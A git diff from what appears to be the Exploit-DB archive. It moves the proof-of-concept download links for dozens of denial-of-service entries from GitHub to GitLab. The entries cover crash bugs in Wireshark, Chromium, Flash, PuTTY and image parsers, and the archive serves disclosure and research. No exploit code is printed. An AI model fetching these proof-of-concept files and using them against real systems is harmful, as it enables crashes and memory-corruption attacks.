a/exploits/multiple/dos/39077.txt +++ b/exploits/multiple/dos/39077.txt @@ -82,4 +82,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39077.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39077.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39162.txt b/exploits/multiple/dos/39162.txt index 7cb72ee39..91700e0f0 100644 --- a/exploits/multiple/dos/39162.txt +++ b/exploits/multiple/dos/39162.txt @@ -92,4 +92,4 @@ The crash was reported at https://code.google.com/p/chromium/issues/detail?id=55 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39162.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39162.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39163.txt b/exploits/multiple/dos/39163.txt index 9e3170752..b29c73913 100644 --- a/exploits/multiple/dos/39163.txt +++ b/exploits/multiple/dos/39163.txt @@ -80,4 +80,4 @@ The crash was reported at https://code.google.com/p/chromium/issues/detail?id=55 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39163.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39163.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39164.txt b/exploits/multiple/dos/39164.txt index fa4a905f6..58e771d26 100644 --- a/exploits/multiple/dos/39164.txt +++ b/exploits/multiple/dos/39164.txt @@ -55,4 +55,4 @@ The crash was reported at https://code.google.com/p/chromium/issues/detail?id=55 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39164.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39164.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39165.txt b/exploits/multiple/dos/39165.txt index 0878087ee..62b9b1a5f 100644 --- a/exploits/multiple/dos/39165.txt +++ b/exploits/multiple/dos/39165.txt @@ -80,4 +80,4 @@ The crash was reported at https://code.google.com/p/chromium/issues/detail?id=55 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39165.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39165.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39219.txt b/exploits/multiple/dos/39219.txt index 95cd8c139..fac3541c1 100644 --- a/exploits/multiple/dos/39219.txt +++ b/exploits/multiple/dos/39219.txt @@ -4,4 +4,4 @@ The attached swf file causes an out-of-bounds memset in BlurFilter processing. N Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39219.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39219.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39321.txt b/exploits/multiple/dos/39321.txt index a6d4f89ed..6fd5046a7 100644 --- a/exploits/multiple/dos/39321.txt +++ b/exploits/multiple/dos/39321.txt @@ -99,4 +99,4 @@ The crash was reported at https://code.google.com/p/chromium/issues/detail?id=55 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39321.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39321.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39322.txt b/exploits/multiple/dos/39322.txt index cc37cfddb..6dc7d7193 100644 --- a/exploits/multiple/dos/39322.txt +++ b/exploits/multiple/dos/39322.txt @@ -105,4 +105,4 @@ The crash was reported at https://code.google.com/p/chromium/issues/detail?id=55 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39322.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39322.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39323.txt b/exploits/multiple/dos/39323.txt index c9b991477..5c92a72e4 100644 --- a/exploits/multiple/dos/39323.txt +++ b/exploits/multiple/dos/39323.txt @@ -61,4 +61,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39323.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39323.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39324.txt b/exploits/multiple/dos/39324.txt index 2c747d61f..437cedbf6 100644 --- a/exploits/multiple/dos/39324.txt +++ b/exploits/multiple/dos/39324.txt @@ -109,4 +109,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39324.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39324.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39325.txt b/exploits/multiple/dos/39325.txt index 56782ec20..d229179f9 100644 --- a/exploits/multiple/dos/39325.txt +++ b/exploits/multiple/dos/39325.txt @@ -85,4 +85,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39325.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39325.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39326.txt b/exploits/multiple/dos/39326.txt index 6d4c3238c..2f5845c07 100644 --- a/exploits/multiple/dos/39326.txt +++ b/exploits/multiple/dos/39326.txt @@ -60,4 +60,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39326.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39326.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39327.txt b/exploits/multiple/dos/39327.txt index 6a1e1d69e..b02ddab63 100644 --- a/exploits/multiple/dos/39327.txt +++ b/exploits/multiple/dos/39327.txt @@ -129,4 +129,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39327.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39327.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39358.txt b/exploits/multiple/dos/39358.txt index 2ef2ec7ea..7386b3940 100644 --- a/exploits/multiple/dos/39358.txt +++ b/exploits/multiple/dos/39358.txt @@ -96,4 +96,4 @@ state of the stack. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39358.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39358.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39379.txt b/exploits/multiple/dos/39379.txt index 0f7591409..160081301 100644 --- a/exploits/multiple/dos/39379.txt +++ b/exploits/multiple/dos/39379.txt @@ -180,4 +180,4 @@ Guessing that this affects iOS too but haven't tested. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39379.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39379.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39401.txt b/exploits/multiple/dos/39401.txt index 1d3107c26..16724ef1e 100644 --- a/exploits/multiple/dos/39401.txt +++ b/exploits/multiple/dos/39401.txt @@ -142,4 +142,4 @@ The crash was reported at https://code.google.com/p/chromium/issues/detail?id=55 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39401.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39401.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39426.txt b/exploits/multiple/dos/39426.txt index a7312a309..46db248af 100644 --- a/exploits/multiple/dos/39426.txt +++ b/exploits/multiple/dos/39426.txt @@ -4,4 +4,4 @@ The attached mp4 file causes stack corruption in Flash. To run the test, load Lo Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39426-1.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39426-1.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39460.txt b/exploits/multiple/dos/39460.txt index a094bcb1b..8cfd1a864 100644 --- a/exploits/multiple/dos/39460.txt +++ b/exploits/multiple/dos/39460.txt @@ -4,4 +4,4 @@ The attached file can cause an out-of-bounds read of an image. While the bits of Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39460.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39460.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39461.txt b/exploits/multiple/dos/39461.txt index 984ed8679..8b8343e9f 100644 --- a/exploits/multiple/dos/39461.txt +++ b/exploits/multiple/dos/39461.txt @@ -21,4 +21,4 @@ Then in the swf, a backing object of a different type with ID 0xfff9 is created, Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39461.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39461.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39462.txt b/exploits/multiple/dos/39462.txt index da68eeb46..0f5cf747c 100644 --- a/exploits/multiple/dos/39462.txt +++ b/exploits/multiple/dos/39462.txt @@ -29,4 +29,4 @@ A full PoC and swf are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39462.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39462.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39463.txt b/exploits/multiple/dos/39463.txt index e48df856a..a75bfae9f 100644 --- a/exploits/multiple/dos/39463.txt +++ b/exploits/multiple/dos/39463.txt @@ -24,4 +24,4 @@ A sample swf and fla are attached. This issue was reproduced in Chrome on 64-bit Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39463.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39463.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39464.txt b/exploits/multiple/dos/39464.txt index 0b4ed9a1d..b739b8aaf 100644 --- a/exploits/multiple/dos/39464.txt +++ b/exploits/multiple/dos/39464.txt @@ -4,4 +4,4 @@ There is an out-of-bounds read in H264 parsing, a fuzzed file is attached. To lo Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39464.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39464.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39465.txt b/exploits/multiple/dos/39465.txt index 95098bcd4..4e582e598 100644 --- a/exploits/multiple/dos/39465.txt +++ b/exploits/multiple/dos/39465.txt @@ -4,4 +4,4 @@ The attached file causes a crash due to a heap overflow, probably due to an issu Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39465.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39465.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39466.txt b/exploits/multiple/dos/39466.txt index 86f4e6c9e..92680e7fd 100644 --- a/exploits/multiple/dos/39466.txt +++ b/exploits/multiple/dos/39466.txt @@ -4,4 +4,4 @@ The attached flv file causes stack corruption when loaded into Flash. To use the Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39466.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39466.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39467.txt b/exploits/multiple/dos/39467.txt index 6ce259e03..776d12007 100644 --- a/exploits/multiple/dos/39467.txt +++ b/exploits/multiple/dos/39467.txt @@ -4,4 +4,4 @@ The attached fuzz test case causes a crash due to a heap overflow in BitmapData. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39467.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39467.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39476.txt b/exploits/multiple/dos/39476.txt index 0d3fab85f..5c6bbe37a 100644 --- a/exploits/multiple/dos/39476.txt +++ b/exploits/multiple/dos/39476.txt @@ -12,4 +12,4 @@ When the button is created, the font will be type confused with a button. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39476.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39476.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39482.txt b/exploits/multiple/dos/39482.txt index 1fb902268..99e2f0957 100644 --- a/exploits/multiple/dos/39482.txt +++ b/exploits/multiple/dos/39482.txt @@ -94,4 +94,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39482.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39482.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39483.txt b/exploits/multiple/dos/39483.txt index 86a7ff558..9ec0a73e7 100644 --- a/exploits/multiple/dos/39483.txt +++ b/exploits/multiple/dos/39483.txt @@ -70,4 +70,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39483.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39483.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39484.txt b/exploits/multiple/dos/39484.txt index acdcd0792..b10bf7b97 100644 --- a/exploits/multiple/dos/39484.txt +++ b/exploits/multiple/dos/39484.txt @@ -137,4 +137,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39484.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39484.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39490.txt b/exploits/multiple/dos/39490.txt index ab0397b9f..46138288e 100644 --- a/exploits/multiple/dos/39490.txt +++ b/exploits/multiple/dos/39490.txt @@ -62,4 +62,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39490.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39490.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39503.txt b/exploits/multiple/dos/39503.txt index e6083feec..d8fc93b22 100644 --- a/exploits/multiple/dos/39503.txt +++ b/exploits/multiple/dos/39503.txt @@ -101,4 +101,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39503.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39503.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39529.txt b/exploits/multiple/dos/39529.txt index 39c787d45..9479539b2 100644 --- a/exploits/multiple/dos/39529.txt +++ b/exploits/multiple/dos/39529.txt @@ -67,4 +67,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39529.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39529.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39551.txt b/exploits/multiple/dos/39551.txt index 1d3f36644..ac98e22ff 100644 --- a/exploits/multiple/dos/39551.txt +++ b/exploits/multiple/dos/39551.txt @@ -31,4 +31,4 @@ The vulnerable code is located in pscp.c [4] line 1498 (HEAD) and is based on an Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39551.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39551.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39604.txt b/exploits/multiple/dos/39604.txt index 245ac8870..f8bda31f4 100644 --- a/exploits/multiple/dos/39604.txt +++ b/exploits/multiple/dos/39604.txt @@ -94,4 +94,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39604.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39604.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39633.txt b/exploits/multiple/dos/39633.txt index 7126ef6bc..a7871995b 100644 --- a/exploits/multiple/dos/39633.txt +++ b/exploits/multiple/dos/39633.txt @@ -63,6 +63,6 @@ By providing a malformed FPX file, an attacker is able to create controlled memo Proof of Concept: http://protekresearchlab.com/exploits/COSIG-2016-14.fpx -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39633.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39633.zip ############################################################################### \ No newline at end of file diff --git a/exploits/multiple/dos/39634.txt b/exploits/multiple/dos/39634.txt index e4ffdb5ca..1f8d234ac 100644 --- a/exploits/multiple/dos/39634.txt +++ b/exploits/multiple/dos/39634.txt @@ -62,6 +62,6 @@ By providing a malformed FPX file, an attacker is able to create controlled memo =========== http://protekresearchlab.com/exploits/COSIG-2016-15.fpx -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39634.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39634.zip ############################################################################### \ No newline at end of file diff --git a/exploits/multiple/dos/39635.txt b/exploits/multiple/dos/39635.txt index 5ddf01f6e..bfa160a7b 100644 --- a/exploits/multiple/dos/39635.txt +++ b/exploits/multiple/dos/39635.txt @@ -62,6 +62,6 @@ By providing a malformed PSD file, an attacker is able to create an out of bound =========== http://protekresearchlab.com/exploits/COSIG-2016-16.psd -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39635.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39635.zip ############################################################################### \ No newline at end of file diff --git a/exploits/multiple/dos/39644.txt b/exploits/multiple/dos/39644.txt index 7c02b55b8..e345a00fb 100644 --- a/exploits/multiple/dos/39644.txt +++ b/exploits/multiple/dos/39644.txt @@ -94,4 +94,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39644.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39644.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39649.txt b/exploits/multiple/dos/39649.txt index fd0c304bc..02936115f 100644 --- a/exploits/multiple/dos/39649.txt +++ b/exploits/multiple/dos/39649.txt @@ -31,4 +31,4 @@ A sample script and SWF are attached. Note that file.txt needs to be in the same Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39649.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39649.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39650.txt b/exploits/multiple/dos/39650.txt index ab5d830a4..6594b651c 100644 --- a/exploits/multiple/dos/39650.txt +++ b/exploits/multiple/dos/39650.txt @@ -25,4 +25,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39650.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39650.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39652.txt b/exploits/multiple/dos/39652.txt index fc18bdfef..ff6442bd1 100644 --- a/exploits/multiple/dos/39652.txt +++ b/exploits/multiple/dos/39652.txt @@ -21,4 +21,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39652.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39652.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39748.txt b/exploits/multiple/dos/39748.txt index 292de9bee..11e3fd44e 100644 --- a/exploits/multiple/dos/39748.txt +++ b/exploits/multiple/dos/39748.txt @@ -111,4 +111,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39748.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39748.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39749.txt b/exploits/multiple/dos/39749.txt index a5ba3a430..393a2d4fc 100644 --- a/exploits/multiple/dos/39749.txt +++ b/exploits/multiple/dos/39749.txt @@ -106,4 +106,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39749.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39749.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39750.txt b/exploits/multiple/dos/39750.txt index e6ef31ad8..6f9065d2a 100644 --- a/exploits/multiple/dos/39750.txt +++ b/exploits/multiple/dos/39750.txt @@ -172,4 +172,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39750.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39750.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39768.txt b/exploits/multiple/dos/39768.txt index b410d916b..a5624e1db 100644 --- a/exploits/multiple/dos/39768.txt +++ b/exploits/multiple/dos/39768.txt @@ -2,7 +2,7 @@ Source: http://web-in-security.blogspot.ca/2016/05/curious-padding-oracle-in-ope TLS-Attacker: https://github.com/RUB-NDS/TLS-Attacker -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39768.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39768.zip You can use TLS-Attacker to build a proof of concept and test your implementation. You just start TLS-Attacker as follows: diff --git a/exploits/multiple/dos/39799.txt b/exploits/multiple/dos/39799.txt index 896ca7705..06f0b9dfa 100644 --- a/exploits/multiple/dos/39799.txt +++ b/exploits/multiple/dos/39799.txt @@ -44,6 +44,6 @@ Technical details: POC: ========== https://plmsecurity.net/sites/plmsecurity.net/files/APSB16-14_PoC.pdf -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39799.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39799.zip ######################################################################################## \ No newline at end of file diff --git a/exploits/multiple/dos/39812.txt b/exploits/multiple/dos/39812.txt index adaed5373..994889535 100644 --- a/exploits/multiple/dos/39812.txt +++ b/exploits/multiple/dos/39812.txt @@ -76,4 +76,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39812.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39812.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39824.txt b/exploits/multiple/dos/39824.txt index 5cfb6b4eb..e3950fb29 100644 --- a/exploits/multiple/dos/39824.txt +++ b/exploits/multiple/dos/39824.txt @@ -8,4 +8,4 @@ LoadImage.swf?img=8 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39824.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39824.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39825.txt b/exploits/multiple/dos/39825.txt index 8603153d8..04a975d13 100644 --- a/exploits/multiple/dos/39825.txt +++ b/exploits/multiple/dos/39825.txt @@ -8,4 +8,4 @@ http://127.0.0.1/LoadImage.swf?img=70 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39825.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39825.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39826.txt b/exploits/multiple/dos/39826.txt index 073d7edda..27d2354ee 100644 --- a/exploits/multiple/dos/39826.txt +++ b/exploits/multiple/dos/39826.txt @@ -8,4 +8,4 @@ LoadImage.swf?img=70 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39826.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39826.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39827.txt b/exploits/multiple/dos/39827.txt index 8718a1ec1..488e4a07d 100644 --- a/exploits/multiple/dos/39827.txt +++ b/exploits/multiple/dos/39827.txt @@ -6,4 +6,4 @@ LoadImage.swf?img=4 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39827.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39827.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39828.txt b/exploits/multiple/dos/39828.txt index 21402acf2..b8af04920 100644 --- a/exploits/multiple/dos/39828.txt +++ b/exploits/multiple/dos/39828.txt @@ -4,4 +4,4 @@ The attached mp4 file causes stack corruption in flash. To load, put LoadMP42.sw Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39828.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39828.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39829.txt b/exploits/multiple/dos/39829.txt index 242fdb30e..92fb19b9b 100644 --- a/exploits/multiple/dos/39829.txt +++ b/exploits/multiple/dos/39829.txt @@ -30,4 +30,4 @@ function myfunc(){ Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39829.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39829.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39830.txt b/exploits/multiple/dos/39830.txt index 43e6db73a..bc0d16b1d 100644 --- a/exploits/multiple/dos/39830.txt +++ b/exploits/multiple/dos/39830.txt @@ -18,4 +18,4 @@ A sample fla and swf are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39830.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39830.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39831.txt b/exploits/multiple/dos/39831.txt index cde1f88f5..7f952434e 100644 --- a/exploits/multiple/dos/39831.txt +++ b/exploits/multiple/dos/39831.txt @@ -17,4 +17,4 @@ A swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39831.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39831.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39834.txt b/exploits/multiple/dos/39834.txt index 07c465e50..db46e6a3b 100644 --- a/exploits/multiple/dos/39834.txt +++ b/exploits/multiple/dos/39834.txt @@ -84,4 +84,4 @@ The bug has been reproduced on a fully patched Windows 7 64-bit with a 32-bit PO Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39834.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39834.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39835.txt b/exploits/multiple/dos/39835.txt index c35d41e53..fbb8d04f1 100644 --- a/exploits/multiple/dos/39835.txt +++ b/exploits/multiple/dos/39835.txt @@ -115,4 +115,4 @@ Source code is included. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39835.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39835.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39859.txt 